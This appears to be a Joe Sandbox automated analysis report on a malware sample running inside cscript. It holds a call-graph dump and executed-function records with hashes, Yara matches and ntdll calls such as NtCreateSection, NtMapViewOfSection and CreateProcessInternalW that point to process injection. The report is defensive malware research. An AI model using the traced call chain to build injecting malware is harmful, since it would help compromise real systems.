4bd2c11 114233->114235 114234->113985 114235->113985 114237 27caf60 LdrLoadDll 114236->114237 114238 27ca68c RtlFreeHeap 114237->114238 114238->113989 114240 27b7eab 114239->114240 114241 27b7eb0 114239->114241 114240->113908 114242 27cbd40 2 API calls 114241->114242 114249 27b7ed5 114242->114249 114243 27b7f38 114243->113908 114244 27c9ec0 2 API calls 114244->114249 114245 27b7f3e 114246 27b7f64 114245->114246 114248 27ca5c0 2 API calls 114245->114248 114246->113908 114251 27b7f55 114248->114251 114249->114243 114249->114244 114249->114245 114250 27cbd40 2 API calls 114249->114250 114255 27ca5c0 114249->114255 114250->114249 114251->113908 114253 27ca5c0 2 API calls 114252->114253 114254 27b817e 114253->114254 114254->113865 114256 27caf60 LdrLoadDll 114255->114256 114257 27ca5dc 114256->114257 114260 4bd2c70 LdrInitializeThunk 114257->114260 114258 27ca5f3 114258->114249 114260->114258 114262 27cb5c3 114261->114262 114265 27bace0 114262->114265 114266 27bad04 114265->114266 114267 27bad40 LdrLoadDll 114266->114267 114268 27b9c3a 114266->114268 114267->114268 114268->113871 114270 27bb053 114269->114270 114272 27bb0d0 114270->114272 114284 27c9c90 LdrLoadDll 114270->114284 114272->113878 114274 27caf60 LdrLoadDll 114273->114274 114275 27bf1ab 114274->114275 114275->113881 114276 27ca7d0 114275->114276 114277 27caf60 LdrLoadDll 114276->114277 114278 27ca7ef LookupPrivilegeValueW 114277->114278 114278->113883 114280 27caf60 LdrLoadDll 114279->114280 114281 27ca27c 114280->114281 114285 4bd2ea0 LdrInitializeThunk 114281->114285 114282 27ca29b 114282->113884 114284->114272 114285->114282 114287 27bb1b9 114286->114287 114288 27bb030 LdrLoadDll 114287->114288 114289 27bb1f4 114288->114289 114289->113818 114291 27baf24 114290->114291 114363 27c9c90 LdrLoadDll 114291->114363 114293 27baf5e 114293->113820 114295 27bf39c 114294->114295 114296 27bb1b0 LdrLoadDll 114295->114296 114297 27bf3ae 114296->114297 114364 27bf280 114297->114364 114300 27bf3c9 114302 27bf3d4 114300->114302 114304 27ca490 2 API calls 114300->114304 114301 27bf3e1 114303 27bf3f2 114301->114303 114305 27ca490 2 API calls 114301->114305 114302->113824 114303->113824 114304->114302 114305->114303 114307 27bf42c 114306->114307 114383 27bb2a0 114307->114383 114309 27bf43e 114310 27bf280 3 API calls 114309->114310 114311 27bf44f 114310->114311 114312 27bf459 114311->114312 114314 27bf471 114311->114314 114315 27ca490 2 API calls 114312->114315 114316 27bf464 114312->114316 114313 27bf482 114313->113826 114314->114313 114317 27ca490 2 API calls 114314->114317 114315->114316 114316->113826 114317->114313 114319 27bca96 114318->114319 114320 27bcaa0 114318->114320 114319->113835 114321 27baf00 LdrLoadDll 114320->114321 114322 27bcb3e 114321->114322 114323 27bcb64 114322->114323 114324 27bb030 LdrLoadDll 114322->114324 114323->113835 114325 27bcb80 114324->114325 114326 27c4a40 8 API calls 114325->114326 114327 27bcbd5 114326->114327 114327->113835 114329 27bd636 114328->114329 114330 27bb030 LdrLoadDll 114329->114330 114331 27bd64a 114330->114331 114387 27bd300 114331->114387 114333 27b908b 114334 27bcbf0 114333->114334 114335 27bcc16 114334->114335 114336 27bb030 LdrLoadDll 114335->114336 114337 27bcc99 114335->114337 114336->114337 114338 27bb030 LdrLoadDll 114337->114338 114339 27bcd06 114338->114339 114340 27baf00 LdrLoadDll 114339->114340 114341 27bcd6f 114340->114341 114342 27bb030 LdrLoadDll 114341->114342 114343 27bce1f 114342->114343 114343->113847 114416 27bf6c0 114344->114416 114346 27b8d14 114357 27b8f25 114346->114357 114421 27c4390 114346->114421 114348 27b8d70 114348->114357 114424 27b8ab0 114348->114424 114351 27ccf30 2 API calls 114352 27b8db2 114351->114352 114353 27cd060 3 API calls 114352->114353 114358 27b8dc7 114353->114358 114354 27b7ea0 4 API calls 114354->114358 114357->113805 114358->114354 114358->114357 114359 27bc7a0 18 API calls 114358->114359 114360 27b8160 2 API calls 114358->114360 114429 27bf660 114358->114429 114433 27bf070 21 API calls 114358->114433 114359->114358 114360->114358 114361->113828 114362->113852 114363->114293 114365 27bf29a 114364->114365 114373 27bf350 114364->114373 114366 27bb030 LdrLoadDll 114365->114366 114367 27bf2bc 114366->114367 114374 27c9f40 114367->114374 114369 27bf2fe 114377 27c9f80 114369->114377 114372 27ca490 2 API calls 114372->114373 114373->114300 114373->114301 114375 27caf60 LdrLoadDll 114374->114375 114376 27c9f5c 114375->114376 114376->114369 114378 27caf60 LdrLoadDll 114377->114378 114379 27c9f9c 114378->114379 114382 4bd35c0 LdrInitializeThunk 114379->114382 114380 27bf344 114380->114372 114382->114380 114384 27bb2c7 114383->114384 114385 27bb030 LdrLoadDll 114384->114385 114386 27bb303 114385->114386 114386->114309 114388 27bd317 114387->114388 114396 27bf700 114388->114396 114392 27bd38b 114393 27bd392 114392->114393 114407 27ca2a0 LdrLoadDll 114392->114407 114393->114333 114395 27bd3a5 114395->114333 114397 27bf725 114396->114397 114408 27b81a0 114397->114408 114399 27bd35f 114404 27ca6e0 114399->114404 114400 27c4a40 8 API calls 114402 27bf749 114400->114402 114402->114399 114402->114400 114403 27cbdc0 2 API calls 114402->114403 114415 27bf540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 114402->114415 114403->114402 114405 27caf60 LdrLoadDll 114404->114405 114406 27ca6ff CreateProcessInternalW 114405->114406 114406->114392 114407->114395 114409 27b829f 114408->114409 114410 27b81b5 114408->114410 114409->114402 114410->114409 114411 27c4a40 8 API calls 114410->114411 114412 27b8222 114411->114412 114413 27cbdc0 2 API calls 114412->114413 114414 27b8249 114412->114414 114413->114414 114414->114402 114415->114402 114417 27c4e40 LdrLoadDll 114416->114417 114418 27bf6df 114417->114418 114419 27bf6ed 114418->114419 114420 27bf6e6 SetErrorMode 114418->114420 114419->114346 114420->114419 114434 27bf490 114421->114434 114423 27c43b6 114423->114348 114425 27cbd40 2 API calls 114424->114425 114428 27b8ad5 114425->114428 114426 27b8cea 114426->114351 114428->114426 114453 27c9880 114428->114453 114430 27bf673 114429->114430 114501 27c9e90 114430->114501 114433->114358 114435 27bf4ad 114434->114435 114441 27c9fc0 114435->114441 114438 27bf4f5 114438->114423 114442 27caf60 LdrLoadDll 114441->114442 114443 27c9fdc 114442->114443 114444 27bf4ee 114443->114444 114451 4bd2f30 LdrInitializeThunk 114443->114451 114444->114438 114446 27ca010 114444->114446 114447 27caf60 LdrLoadDll 114446->114447 114448 27ca02c 114447->114448 114452 4bd2d10 LdrInitializeThunk 114448->114452 114449 27bf51e 114449->114423 114451->114444 114452->114449 114454 27cbf90 2 API calls 114453->114454 114455 27c9897 114454->114455 114474 27b9310 114455->114474 114457 27c98b2 114458 27c98d9 114457->114458 114459 27c98f0 114457->114459 114460 27cbdc0 2 API calls 114458->114460 114462 27cbd40 2 API calls 114459->114462 114461 27c98e6 114460->114461 114461->114426 114463 27c992a 114462->114463 114464 27cbd40 2 API calls 114463->114464 114465 27c9943 114464->114465 114471 27c9be4 114465->114471 114480 27cbd80 LdrLoadDll 114465->114480 114467 27c9bc9 114468 27c9bd0 114467->114468 114467->114471 114469 27cbdc0 2 API calls 114468->114469 114470 27c9bda 114469->114470 114470->114426 114472 27cbdc0 2 API calls 114471->114472 114473 27c9c39 114472->114473 114473->114426 114475 27b9335 114474->114475 114476 27bace0 LdrLoadDll 114475->114476 114477 27b9368 114476->114477 114479 27b938d 114477->114479 114481 27bcf10 114477->114481 114479->114457 114480->114467 114482 27bcf3c 114481->114482 114483 27ca1e0 LdrLoadDll 114482->114483 114484 27bcf55 114483->114484 114485 27bcf5c 114484->114485 114492 27ca220 114484->114492 114485->114479 114489 27bcf97 114490 27ca490 2 API calls 114489->114490 114491 27bcfba 114490->114491 114491->114479 114493 27caf60 LdrLoadDll 114492->114493 114494 27ca23c 114493->114494 114500 4bd2ca0 LdrInitializeThunk 114494->114500 114495 27bcf7f 114495->114485 114497 27ca810 114495->114497 114498 27caf60 LdrLoadDll 114497->114498 114499 27ca82f 114498->114499 114499->114489 114500->114495 114502 27caf60 LdrLoadDll 114501->114502 114503 27c9eac 114502->114503 114506 4bd2dd0 LdrInitializeThunk 114503->114506 114504 27bf69e 114504->114358 114506->114504 114507 27c9080 114508 27cbd40 2 API calls 114507->114508 114510 27c90bb 114508->114510 114509 27c919c 114510->114509 114511 27bace0 LdrLoadDll 114510->114511 114512 27c90f1 114511->114512 114513 27c4e40 LdrLoadDll 114512->114513 114515 27c910d 114513->114515 114514 27c9120 Sleep 114514->114515 114515->114509 114515->114514 114518 27c8ca0 LdrLoadDll 114515->114518 114519 27c8eb0 LdrLoadDll 114515->114519 114518->114515 114519->114515 114520 4bd2ad0 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 04A4A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL ref: 04A4A19F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: 0
                                                      • API String ID: 1778838933-4108050209
                                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                      • Instruction ID: c6c05a01714ed6c03220b2ac352138fe2b6d0ab16c588d50f6f77a7263ff1548
                                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                      • Instruction Fuzzy Hash: 9BF11074518A4C8FDBA9EF68C894AEEB7E0FBD8304F50462AD44ED7251DF34A541CB41
                                                      Function 04A49BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 209 4a49baf-4a49bfe call 4a49102 212 4a49c00 209->212 213 4a49c0c-4a49c9a call 4a4b942 * 2 NtCreateSection 209->213 214 4a49c02-4a49c0a 212->214 219 4a49ca0-4a49d0a call 4a4b942 NtMapViewOfSection 213->219 220 4a49d5a-4a49d68 213->220 214->213 214->214 223 4a49d52 219->223 224 4a49d0c-4a49d4c 219->224 223->220 226 4a49d4e-4a49d4f 224->226 227 4a49d69-4a49d6b 224->227 226->223 228 4a49d6d-4a49d72 227->228 229 4a49d88-4a49ddc call 4a4cd62 NtClose 227->229 230 4a49d74-4a49d86 call 4a49172 228->230 230->229
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Section$CloseCreateView
                                                      • String ID: @$@
                                                      • API String ID: 1133238012-149943524
                                                      • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                      • Instruction ID: bd983c58829b078fb5a88700ee256990739994cb1481d5c663285842136b051a
                                                      • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                      • Instruction Fuzzy Hash: 5B616170518B488FDB58DF68D8856AEBBE0FBD8314F50062EE58AC3651DB35E441CB86
                                                      Function 04A49BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 4a49bb2-4a49bef 269 4a49bf7-4a49bfe 268->269 270 4a49bf2 call 4a49102 268->270 271 4a49c00 269->271 272 4a49c0c-4a49c9a call 4a4b942 * 2 NtCreateSection 269->272 270->269 273 4a49c02-4a49c0a 271->273 278 4a49ca0-4a49d0a call 4a4b942 NtMapViewOfSection 272->278 279 4a49d5a-4a49d68 272->279 273->272 273->273 282 4a49d52 278->282 283 4a49d0c-4a49d4c 278->283 282->279 285 4a49d4e-4a49d4f 283->285 286 4a49d69-4a49d6b 283->286 285->282 287 4a49d6d-4a49d72 286->287 288 4a49d88-4a49ddc call 4a4cd62 NtClose 286->288 289 4a49d74-4a49d86 call 4a49172 287->289 289->288
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Section$CreateView
                                                      • String ID: @$@
                                                      • API String ID: 1585966358-149943524
                                                      • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                      • Instruction ID: df1537e378213e408c4181d12441231bae3f9ceddc9b6a105968d0b1a9430ef3
                                                      • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                      • Instruction Fuzzy Hash: 095170B05187088FDB58DF68D8956AFBBE4FB88314F50062EE58AC3651DF35E441CB86
                                                      Function 04A4A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL ref: 04A4A19F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: 0
                                                      • API String ID: 1778838933-4108050209
                                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                      • Instruction ID: 4ee1f356b4bbda3964de5555979f67977d316eb4208b7a29a2061f3b9ca46597
                                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                      • Instruction Fuzzy Hash: FB511B70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7251DF309645CB41
                                                      Function 027CA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 546 27ca360-27ca3b1 call 27caf60 NtCreateFile
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,027C4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027C4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 027CA3AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: 2ad25d307c67fbfdce50f5ff64ffd393fc383e5db7ebe09c23d7d4242d361fbb
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: C7F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                      Function 027CA40B Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(027C4D62,5EB65239,FFFFFFFF,027C4A21,?,?,027C4D62,?,027C4A21,FFFFFFFF,5EB65239,027C4D62,?,00000000), ref: 027CA455
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: cc261815be1b76bbf6ed8d0ec2f5f52c8170b3f1ba0c5c550c920ec06b4a661b
                                                      • Instruction ID: 1ca77a0e1ac96f63a74a4acb3ea3ed3bc3ecb6a464a3b91669384146523e536a
                                                      • Opcode Fuzzy Hash: cc261815be1b76bbf6ed8d0ec2f5f52c8170b3f1ba0c5c550c920ec06b4a661b
                                                      • Instruction Fuzzy Hash: 32F0C4B2200108AFCB14CF99CC85DEBB7A9EF8C354F118248BA1DA7244DA30E811CBA0
                                                      Function 027CA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(027C4D62,5EB65239,FFFFFFFF,027C4A21,?,?,027C4D62,?,027C4A21,FFFFFFFF,5EB65239,027C4D62,?,00000000), ref: 027CA455
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: b6aa919d1b15d9f51eeaf56ba9eda6944537c59625fd853f857daf9db1af673c
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 17F0B7B2200208AFCB14DF99DC84EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                      Function 027CA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027B2D11,00002000,00003000,00000004), ref: 027CA579
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 0843c89205646a44e4f819aa44a0ce4bc647ac57b0e36079cdcb50dca84f4cb2
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: 58F015B2200208ABCB14DF89CC80EAB77ADEF88754F118148BE0897241C630F810CBA0
                                                      Function 027CA48A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(027C4D40,?,?,027C4D40,00000000,FFFFFFFF), ref: 027CA4B5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 1afca4c59a114cc017ac28b904ff86571fccce21da28450a8850a3a11c2b6b6e
                                                      • Instruction ID: 0b185f8c33e43acd46852a238f8b8641ba05135772e8ef436224a4028b7dc904
                                                      • Opcode Fuzzy Hash: 1afca4c59a114cc017ac28b904ff86571fccce21da28450a8850a3a11c2b6b6e
                                                      • Instruction Fuzzy Hash: 2CE08CB6240204ABE710EF94CC84EA77B68EB44710F208459BA585B241C630EA0087D0
                                                      Function 027CA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(027C4D40,?,?,027C4D40,00000000,FFFFFFFF), ref: 027CA4B5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: 03d5962372b8c88f1b8de69ae36a4cf9f391862f8a067bfd9125f2c33b144656
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 32D012762002186BD710EF98CC45E97775DEF44750F154459BA185B241C530F50086E0
                                                      Function 04BD2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                      • Instruction ID: 24dfd854b1d47dee5fcec5bb9829309ce57904cbb2faaf38374f8b5a52e83e47
                                                      • Opcode Fuzzy Hash: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                      • Instruction Fuzzy Hash: 7F90023220180402F100759954086560005CBE0305F55E051A5025656EC769D9927131
                                                      Function 04BD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                      • Instruction ID: bace431588dedca7a6790826963360f40ca83c11edf2a528eb5121b3e80cf149
                                                      • Opcode Fuzzy Hash: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                      • Instruction Fuzzy Hash: 9890023220188802F1107159840475A0005CBD0305F59D451A4425759D8799D9927121
                                                      Function 04BD2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                      • Instruction ID: c621560d602fda867b196f7b89b2bc1470dd1a21ccce025b349f846b65745b2c
                                                      • Opcode Fuzzy Hash: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                      • Instruction Fuzzy Hash: E190023220180842F10071594404B560005CBE0305F55D056A0125755D8719D9527521
                                                      Function 04BD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                      • Instruction ID: 155cadcdb3e84791afcc0b144f45141414e9f13a245d3f65683a7f7c7edb5cec
                                                      • Opcode Fuzzy Hash: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                      • Instruction Fuzzy Hash: 9390023220180413F111715945047170009CBD0245F95D452A0425659D975ADA53B121
                                                      Function 04BD2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                      • Instruction ID: bffd333265f89fdb715c466db1f882ac24ef318a6a3da0b019deb01f7c887a52
                                                      • Opcode Fuzzy Hash: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                      • Instruction Fuzzy Hash: 9D900222242841527545B15944045174006DBE0245795D052A1415A51C862AE957E621
                                                      Function 04BD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                      • Instruction ID: 166748229a3b8c12b60bea6b13829603b868b7bb9d55510ac29d1965f4b904d0
                                                      • Opcode Fuzzy Hash: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                      • Instruction Fuzzy Hash: AC90022A21380002F1807159540861A0005CBD1206F95E455A0016659CCA19D96A6321
                                                      Function 04BD2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
